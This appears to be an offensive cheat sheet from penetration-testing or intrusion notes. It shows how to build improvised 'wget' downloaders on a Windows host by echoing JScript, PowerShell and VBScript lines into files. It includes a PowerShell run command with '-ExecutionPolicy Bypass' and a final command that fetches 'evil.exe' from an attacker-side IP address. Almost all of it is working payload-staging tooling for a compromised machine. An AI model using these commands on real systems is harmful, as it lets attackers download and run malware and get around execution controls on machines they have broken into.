# wget

### JS
```shell
echo var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); > wget.js
echo WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); >> wget.js
echo WinHttpReq.Send(); >> wget.js
echo BinStream = new ActiveXObject("ADODB.Stream"); >> wget.js
echo BinStream.Type = 1; >> wget.js
echo BinStream.Open(); >> wget.js
echo BinStream.Write(WinHttpReq.ResponseBody); >> wget.js
echo BinStream.SaveToFile("out.exe"); >> wget.js
```
`cscript /nologo wget.js http://<ip>/<file>`

### PowerShell
```shell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://$args[0]:$args[1]/$args[2]" >>wget.ps1
echo $file = "$args[2]" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
```
* oneliner paste
```shell
echo $storageDir = $pwd > wget.ps1&echo $webclient = New-Object System.Net.WebClient >>wget.ps1&echo $url = "http://$args[0]/$args[1]" >>wget.ps1&echo $file = "$args[1]" >>wget.ps1&echo $webclient.DownloadFile($url,$file) >>wget.ps1
```

`powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1`


### VBS
```shell
echo 'strUrl = WScript.Arguments.Item(0)' > wget.vbs
echo 'StrFile = WScript.Arguments.Item(1)' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_DIRECT = 1' >> wget.vbs
echo 'Const HTTPREQUEST_PROXYSETTING_PROXY = 2' >> wget.vbs
echo 'Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts' >> wget.vbs
echo 'Err.Clear' >> wget.vbs
echo 'Set http = Nothing' >> wget.vbs
echo 'Set http = CreateObject("WinHttp.WinHttpRequest.5.1")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")' >> wget.vbs
echo 'If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")' >> wget.vbs
echo 'http.Open "GET", strURL, False' >> wget.vbs
echo 'http.Send' >> wget.vbs
echo 'varByteArray = http.ResponseBody' >> wget.vbs
echo 'Set http = Nothing' >> wget.vbs
echo 'Set fs = CreateObject("Scripting.FileSystemObject")' >> wget.vbs
echo 'Set ts = fs.CreateTextFile(StrFile, True)' >> wget.vbs
echo 'strData = ""' >> wget.vbs
echo 'strBuffer = ""' >> wget.vbs
echo 'For lngCounter = 0 to UBound(varByteArray)' >> wget.vbs
echo 'ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))' >> wget.vbs
echo 'Next' >> wget.vbs
echo 'ts.Close' >> wget.vbs
```

`cscript wget.vbs http://10.11.0.4/evil.exe evil.exe`